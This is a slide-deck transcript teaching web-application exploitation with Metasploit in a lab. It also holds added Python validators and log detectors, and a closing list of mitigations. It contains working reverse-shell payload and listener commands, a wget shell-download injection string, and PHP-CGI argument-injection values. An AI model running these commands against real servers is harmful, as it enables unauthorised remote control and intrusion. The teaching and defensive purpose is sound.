
Introduction to Metasploit: Exploiting Web Applications

Dennis Maldonado (@DennisMald), Application Security Specialist at WhiteHat Security and full-time Computer Information Systems student at the University of Houston – Main Campus.

Presentation Transcript


  1. Dennis Maldonado @DennisMald Introduction to Metasploit: Exploiting Web Applications

  2. Dennis Maldonado • Application Security Specialist, WhiteHat Security • Full-Time Student, University of Houston – Main Campus, Computer Information Systems Major • Twitter: @DennisMald • Website / Blog: KernelMeltdown.org

  3. Tools • Kali Linux – Our attacker machine • Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim. • Metasploitable2 – Victim Web Server

  4. Topic of the day Exploiting the backend server through a web application.

  5. What’s the problem? • Reasons why hackers want to compromise the server: • Run attacks against the internal network • Use the server as a bot • Install backdoors onto the server • Reveal sensitive files/passwords • Execute any local file • Execute remote files • and more…

  6. What’s the problem? • Vulnerabilities that are dangerous against a server • Directory Traversal • Local File Inclusion • Remote File Inclusion • Remote Code Execution • SQL Injection • Command Injection

  7. Directory Traversal http://website.com/?page=index.php

  8. Local File Inclusion http://website.com/?page=index.php

  9. Remote File Inclusion http://website.com/?page=index.php
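Slides 7 to 9 all hinge on the same `?page=` parameter being handed straight to an include. The Python below is an added illustration, not code from the talk or from Metasploitable2: it models that parameter handling with a resolver that behaves like an unchecked `include($_GET['page'])`, a hardened resolver (allowlist, URL/wrapper rejection, containment check), and a classifier that labels a value with the vulnerability class it triggers. The web root, the allowlist and the sample values are constructed for the example.

```python
import os
from urllib.parse import urlsplit

# Constructed for this example (not from the slides): the directory the
# ?page= parameter is supposed to stay inside, and the pages it may name.
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"index.php", "about.php", "contact.php"}


def is_url_or_wrapper(page: str) -> bool:
    """True for http://, ftp://, php://, data: and similar (the RFI / stream-wrapper case)."""
    return bool(urlsplit(page).scheme)


def resolve_page_vulnerable(page: str) -> str:
    """What include($_GET['page']) effectively does: no validation at all.
    A URL comes back untouched (remote file inclusion when allow_url_include
    is on); '../' sequences or an absolute path walk out of WEB_ROOT
    (directory traversal / local file inclusion)."""
    if is_url_or_wrapper(page):
        return page
    return os.path.normpath(os.path.join(WEB_ROOT, page))


def inside_web_root(path: str) -> bool:
    """Containment check: the normalised path must still sit under WEB_ROOT."""
    return os.path.commonpath([WEB_ROOT, path]) == WEB_ROOT


def resolve_page_safe(page: str):
    """Hardened resolver: allowlist the name, refuse URLs and wrappers, and
    still verify containment as defence in depth. Returns None on rejection."""
    if not page or is_url_or_wrapper(page):
        return None
    if page not in ALLOWED_PAGES:
        return None
    # normpath instead of realpath so the example runs without the files
    # existing; production code should use realpath to also resolve symlinks.
    resolved = os.path.normpath(os.path.join(WEB_ROOT, page))
    return resolved if inside_web_root(resolved) else None


def classify(page: str) -> str:
    """Label a ?page= value with the vulnerability class from slides 7-9."""
    if is_url_or_wrapper(page):
        return "remote file inclusion (URL or stream wrapper)"
    if not inside_web_root(resolve_page_vulnerable(page)):
        return "directory traversal / local file inclusion outside web root"
    return "local file inclusion inside web root"


if __name__ == "__main__":
    # Constructed probe values, including the classic /etc/passwd walk.
    for p in ["index.php", "../../../etc/passwd", "/etc/passwd",
              "http://10.211.55.3/shell.txt",
              "php://filter/convert.base64-encode/resource=index.php"]:
        print(f"{p!r}: vulnerable -> {resolve_page_vulnerable(p)!r}, "
              f"safe -> {resolve_page_safe(p)!r}  [{classify(p)}]")
```

The allowlist is the control that matters; the containment check only catches what the allowlist would already reject, but it is cheap and protects against a later edit that loosens the allowlist. Note that `php://filter` is rejected by the scheme check even though it is not "remote": any scheme in this parameter is a wrapper the application never intended.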

  10. Remote Code Execution http://website.com/

  11. SQL Injection http://website.com/user.php?id=1&Submit=Submit#

  12. Command Injection

  13. Metasploit Basics

  14. The Metasploit Project • Metasploit is an open-source framework used for Security development and testing • Information gathering and fingerprinting • Exploitation/Penetration testing • Payload generation and encoding • Fuzzing • And much more…

  15. Metasploit Interfaces • Command Line Interfaces • msfconsole • msfcli • GUI Interfaces • Metasploit Community Edition • Armitage

  16. Metasploit Modules • Exploit – exploitation / proof-of-concept code (e.g. the Ruby on Rails exploit, the PHP-CGI exploit) • Auxiliary – miscellaneous modules for multiple purposes: scanners, DoS tools, fingerprinting, clients • Payloads – code to be executed on the exploited system: system shells, Meterpreter shells • Post – modules for post-exploitation tasks: persistence, password stealing, pivoting

  17. Exploits • Active Exploits • Actively exploit a host • Ex: Ruby on Rails XML exploit • Passive Exploits • Wait for a client to connect (e.g. a browser visiting the attacker's page), then exploit it • Ex: Java 0-days • Exploits carry a payload

  18. Payloads • Inline (Non-Staged) • The complete payload (connection code and shell) is delivered in one piece • Stable • Large size • Staged • A small stager runs first, establishes the connection with the attacker, then pulls down the rest of the payload (the stage) • Meterpreter • Advanced, dynamic payload • Extended over the network • Extensible through modules and plugins

  19. Payloads continued • Types of connections • Bind • Local server gets started on victim machine • Attacker connects to victim • windows/x64/shell/bind_tcp • Reverse • Local server gets started on attacker machine • Victim connects to attacker • windows/x64/shell/reverse_tcp

  20. Vulnerabilities and Exploit Examples

  21. PHP-CGI Argument Injection • CVE-2012-1823 • A query string without an unencoded "=" is passed to php-cgi as command-line arguments • DoS attack • -T 10000 (run the script 10000 times) • Source code disclosure • -s argument • Remote Code Execution • -d argument (sets an ini directive, e.g. allow_url_include / auto_prepend_file)
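The PHP-CGI bug is easy to spot in traffic once you know the CGI rule it rides on: a query string with no unencoded `=` is split on `+` and handed to the binary as argv, which is why the exploit encodes `=` as `%3d` inside the ini assignment. The detector below is an added example (not part of the talk or of Metasploit's module); it reproduces that rule, decodes the would-be argv, and reports the `-s`, `-d` and `-T` uses the slide lists. The request targets are constructed, not real log data.

```python
from urllib.parse import unquote, urlsplit


def cgi_argv_from_query(query: str) -> list:
    """The CGI rule (RFC 3875 section 4.4) that php-cgi inherited: a query
    string containing no unencoded '=' is split on '+' and passed as argv.
    Returns [] for an ordinary key=value query."""
    if "=" in query:
        return []
    return [unquote(tok) for tok in query.split("+") if tok]


def detect_php_cgi_injection(target: str) -> list:
    """Findings for one request target (path + query) as seen in an access
    log. An empty list means the argv rule does not apply or no php-cgi
    option is present."""
    argv = cgi_argv_from_query(urlsplit(target).query)
    findings = []
    for i, arg in enumerate(argv):
        if not arg.startswith("-"):
            continue  # option values are reported together with their option
        opt, attached = arg[:2], arg[2:]
        if opt == "-d":
            # -d may carry its directive attached (-dfoo=1) or as the next argv
            directive = attached or (argv[i + 1] if i + 1 < len(argv) else "")
            findings.append(f"ini override (-d {directive})")
        elif opt == "-s":
            findings.append("source disclosure (-s)")
        elif opt == "-T":
            findings.append("repeated execution / DoS (-T)")
        else:
            findings.append(f"other php-cgi option ({arg})")
    return findings


# Constructed request targets (not real log data): one benign, the three
# attacks from the slide, and one that contains '=' so the rule does not fire.
SAMPLE_TARGETS = [
    "/index.php?page=about.php",
    "/index.php?-s",
    "/index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input",
    "/index.php?-T+10000",
    "/index.php?id=1&-s",
]


def scan(targets):
    """Map each target to its findings; handy for a quick log sweep."""
    return {t: detect_php_cgi_injection(t) for t in targets}


if __name__ == "__main__":
    for t, f in scan(SAMPLE_TARGETS).items():
        print(t, "->", f or "clean")
```

Because the decision is made on the raw query string before URL-decoding, a signature that only looks for `-d` after decoding will also flag harmless `?-d` inside a `key=value` query; checking for the absence of an unencoded `=` first is what keeps the false-positive rate down. The fix on the server side is the version bump on slide 27 (PHP 5.3.13 / 5.4.3).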

  22. Ruby on Rails XML Parameter Parsing Vulnerability • CVE-2013-0156 • Easy to find, easy to exploit, critical vulnerability • Requires just one POST request containing specially crafted XML • XML parameters typed as YAML are deserialised with YAML.load, so the request can instantiate arbitrary Ruby objects and run commands

  23. Unrestricted File Upload • The upload functionality allows any file type to be uploaded • Upload server-side code and check whether it executes • PHP: <?php echo "Hello World!"; ?> • ASP: <% Response.Write("Hello World!") %> • JSP: <%= new java.util.Date().toString() %> • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Upload the shell and execute it
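The three probe strings on slide 23 are also the cheapest server-side check to add. The function below is an added example, not code from the talk or from DVWA/Metasploitable2: it applies the upload mitigations from slide 27 (extension allowlist, content-type check, random rename) and adds a magic-byte check and a scan for the probe markers, so that `shell.php`, `shell.php.jpg` and a GIF with PHP appended are all refused. The allowlist, magic-byte table and sample uploads are constructed for the example.

```python
import os
import secrets

# Constructed allowlist: extension -> the only Content-Type accepted with it,
# and the magic bytes that type must start with.
ALLOWED = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png", "gif": "image/gif"}
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# Extensions that must not appear in ANY dot-separated segment: with Apache's
# AddHandler style configuration, shell.php.jpg can still be run as PHP.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar",
                   "asp", "aspx", "jsp", "jspx", "cgi", "pl", "sh"}
# The probe strings from slide 23, as byte markers for server-side code.
CODE_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def check_upload(filename: str, content_type: str, data: bytes):
    """Return (True, stored_name) or (False, reason). The stored name is
    random so the uploader cannot predict the URL of the file, and it keeps
    only the allowlisted extension."""
    base = os.path.basename(filename).lower()      # drop any client-supplied path
    segments = base.split(".")
    if len(segments) < 2 or not segments[-1]:
        return False, "no extension"
    if EXECUTABLE_EXTS.intersection(segments[1:]):
        return False, "executable extension segment in name"
    ext = segments[-1]
    if ext not in ALLOWED:
        return False, f"extension not allowed: {ext}"
    if content_type != ALLOWED[ext]:
        return False, f"content-type {content_type} does not match .{ext}"
    if not data.startswith(MAGIC[content_type]):
        return False, "magic bytes do not match declared type"
    if any(marker in data for marker in CODE_MARKERS):
        return False, "server-side code marker in content"
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed uploads: the slide's PHP probe under three disguises and one real-looking PNG.
    samples = [
        ("shell.php", "image/png", b"<?php echo \"Hello World!\"; ?>"),
        ("shell.php.jpg", "image/jpeg", b"\xff\xd8\xff<?php echo \"Hello World!\"; ?>"),
        ("logo.gif", "image/gif", b"GIF89a<?php echo \"Hello World!\"; ?>"),
        ("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n" + bytes(16)),
    ]
    for name, ctype, body in samples:
        print(name, "->", check_upload(name, ctype, body))
```

The marker scan is a heuristic (a genuine binary image can contain `<%`), so treat it as a tripwire rather than the control. The durable mitigations are the ones on slide 27 that do not depend on guessing content: store uploads outside the web root or in a directory the server will not execute from, and serve them under the random name.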

  24. Command Injection • Allows an attacker to execute system-level commands • Attempt a safe command first • echo test • uname -a • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Inject curl or wget commands to download the shell onto the victim machine • chmod if necessary and execute
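The injection on slide 24 works because the application pastes the parameter into a command string that a shell then parses. The Python below is an added example, not code from the talk or from DVWA: it shows the vulnerable pattern, the same call with an argv list and no shell, a hardened version that validates first, and a small detection heuristic for the probes the slide uses. `echo` stands in for `ping` so the block runs anywhere; the probe strings and the 10.211.55.3 address are taken from the slides and are otherwise constructed.

```python
import re
import subprocess

# Strict allowlist for the one value the page accepts: hostname or IPv4
# characters only, so no shell metacharacter can pass.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")
# Detection heuristic: shell metacharacters, or the download-and-run tools
# slide 24 injects, inside a value that should be a hostname.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")


def is_safe_host(value: str) -> bool:
    return HOST_RE.fullmatch(value) is not None


def looks_like_injection(value: str) -> bool:
    return bool(SHELL_META.search(value)) or bool(DOWNLOADERS.search(value))


def ping_vulnerable(host: str) -> str:
    """The bug: user input is interpolated into a command line and run
    through a shell, so ';', '|', '`' and '$()' in the input are honoured."""
    proc = subprocess.run(f"echo ping {host}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def no_shell_only(host: str) -> str:
    """Same command without validation but with an argv list and no shell:
    the metacharacters reach echo as literal text and nothing else runs."""
    proc = subprocess.run(["echo", "ping", host], capture_output=True, text=True)
    return proc.stdout


def ping_hardened(host: str) -> str:
    """Validate against the allowlist first, then exec without a shell.
    Either control alone stops the slide's injection; use both."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host: {host!r}")
    proc = subprocess.run(["echo", "ping", host], capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Constructed probes, in the order slide 24 escalates them.
    probes = [
        "10.211.55.3",
        "10.211.55.3; echo test",
        "10.211.55.3; uname -a",
        "10.211.55.3; wget http://10.211.55.3/shell.php -O /tmp/shell.php",
    ]
    for p in probes:
        print(f"{p!r}: injection? {looks_like_injection(p)}")
    print(repr(ping_vulnerable("10.211.55.3; echo test")))  # the second command runs
    print(repr(no_shell_only("10.211.55.3; echo test")))    # printed back literally
```

When `shell=True` is replaced by an argv list, the injected `; echo test` becomes part of a single argument to `echo`; it never reaches a parser that treats `;` specially. The allowlist is still worth keeping, because the target program itself may interpret leading dashes or other characters as options.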

  25. Commands used (note: IP addresses and ports may be different) • msfpayload php/meterpreter/reverse_tcp O (list the payload's options) • msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O • msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php (R = raw output) • # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file. • ================================== • msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E (E = execute) • msfpayload and msfcli were removed from the Metasploit Framework in 2015; the current equivalents are msfvenom -p php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 -f raw > shell.php for the payload and msfconsole -q -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.211.55.3; set LPORT 1337; run" for the listener

  26. Mitigations and Closing

  27. Mitigations • Keep software up to date! • PHP: 5.4.3, 5.3.13 • Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 • Use whitelisting for file upload extensions • Watch for extensions and content-types • Don’t let upload directory be executable • Rename files if possible • Don’t pass user input as a system command! • Use library calls when possible • Sanitize input

  28. Questions? Comments?

  29. Sources • Kali Linux (successor to BackTrack): http://www.kali.org/ • The Metasploit Project: http://www.metasploit.com/ • Metasploit Unleashed: http://www.offensive-security.com/metasploit-unleashed/ • PHP-CGI Advisory (CVE-2012-1823): http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ • Ruby on Rails Exploitation (CVE-2013-0156): https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 • Damn Vulnerable Web Application (DVWA): http://www.dvwa.co.uk/ • Metasploitable 2: http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web
